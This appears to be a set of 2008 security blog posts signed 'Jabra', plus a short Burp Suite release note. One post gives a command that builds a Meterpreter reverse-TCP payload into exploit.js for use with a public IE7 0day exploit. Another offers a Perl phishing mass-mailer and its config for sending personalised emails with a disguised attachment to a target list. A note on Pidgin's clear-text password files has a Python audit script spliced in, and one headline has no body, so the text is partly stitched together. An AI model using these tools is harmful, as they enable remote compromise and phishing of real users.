American Express bitten by XSS bugs (again) 

A little Perl makes an 0day a good day 

There was a recent 0day for IE 7; you may have heard a thing or two about it lately in the press. M$ is releasing an out-of-band patch tomorrow: http://isc.sans.org/diary.html?storyid=5497

meh.

For those of you who wanted a bit of an easier route with the exploit, here are a few helpful hints with Backtrack 3 and some new Perl I whipped up:

$ /pentest/exploit/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 J | ./payloadproper.pl > exploit.js

http://spl0it.org/files/payloadproper.pl

The resulting file can be helpful when used with the exploit on milw0rm.

http://milw0rm.com/sploits/2008-iesploit.tar.gz

Regards,
Jabra


Burpsuite 1.2 released! 

My favorite web application testing framework has just been updated.

http://seclists.org/webappsec/2008/q4/0041.html

Awesome job PortSwigger! I look forward to many future releases.

Regards,
Jabra

Pidgin fail

Recently, a Red Hat friend reminded me of an issue with Pidgin: when you save your password, it is saved in clear text.

Linux/Unix:

~/.purple/accounts.xml

Windows XP:

C:\Documents and Settings\%USERNAME%\Application Data\.purple\accounts.xml

Therefore, keep this in mind when you're working on multi-user systems and don't save your password.
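One way to audit your own profile for this, as an added example (not code from the original post or from Pidgin): it lists which accounts in accounts.xml have a saved password and flags group/other-accessible file permissions, without ever printing the password itself. The XML layout and the sample data are assumptions constructed for illustration.

```python
import os
import stat
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample in the accounts.xml layout assumed here:
# an <account version="1.0"> root holding one <account> per configured login.
SAMPLE = """<?xml version='1.0' encoding='UTF-8' ?>
<account version='1.0'>
  <account>
    <protocol>prpl-jabber</protocol>
    <name>alice@example.org/laptop</name>
    <password>constructed-sample-value</password>
  </account>
  <account>
    <protocol>prpl-irc</protocol>
    <name>alice@irc.example.org</name>
  </account>
</account>
"""

def audit_accounts(path):
    """Report saved passwords and loose permissions without echoing secrets."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    # Any group/other bit lets another local user read or replace the file.
    if os.name == "posix" and mode & 0o077:
        findings.append(("permissions", oct(mode)))
    for acct in ET.parse(path).getroot().iter("account"):
        name = acct.findtext("name")
        if name is None:
            continue  # skips the root wrapper element, which has no <name>
        if (acct.findtext("password") or "").strip():
            findings.append(("saved-password", f"{acct.findtext('protocol')}:{name}"))
    return findings

def demo():
    """Audit the constructed sample, written with a world-readable mode."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "accounts.xml")
        with open(path, "w") as fh:
            fh.write(SAMPLE)
        os.chmod(path, 0o644)
        return audit_accounts(path)

if __name__ == "__main__":
    target = os.path.expanduser("~/.purple/accounts.xml")
    for kind, detail in (audit_accounts(target) if os.path.exists(target) else demo()):
        print(f"{kind}: {detail}")
```

Any "saved-password" finding means the secret sits in the file in clear text; remove the saved password in the client and change it on the service if other users could have read the file.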
Social Engineering Framework for Attacking Clients 

Phishing attacks are easily performed against a single target. What if you want to automate and easily set up a client-based attack against a list of targets?


As always, my solution was Perl.

I set up a custom YAML configuration file to make things a bit easier for daily usage.

http://spl0it.org/files/SEF/config.yaml

# YAML:1.0
# email is sent here
to: email_addresses.csv
# email is sent from this address
from: test@aol.com
# email subject
subject: "Email Subject"
# email type ( text or text/html )
type: text/html
# msg body file
msg: email_body.txt
# number of seconds to wait before next email
wait: 5
# prepend the first name to the email body
name: yes
# add custom signature from file
sig: yes
# signature file
sig_file: sig
# add an email attachment
attachment: yes
# path to file attachment
attachment_file: /tmp/test.jpg
# name of file attachment
attachment_file_name: funny.jpg
# type of attachment
attachment_file_type: image/jpg

The most important piece is email_addresses.csv, which contains the full name of the target, then a comma, then the email address.

Example:

John Smith,john_smith@domain.com

I have even added the ability to:
* add an attachment
* append the first name to the email body
* add a signature to the bottom of the email body taken from a file
* wait X seconds between sending each email
* text or html email formats

http://spl0it.org/files/SEF/email.pl

Let me know what you think.

Regards,
Jabra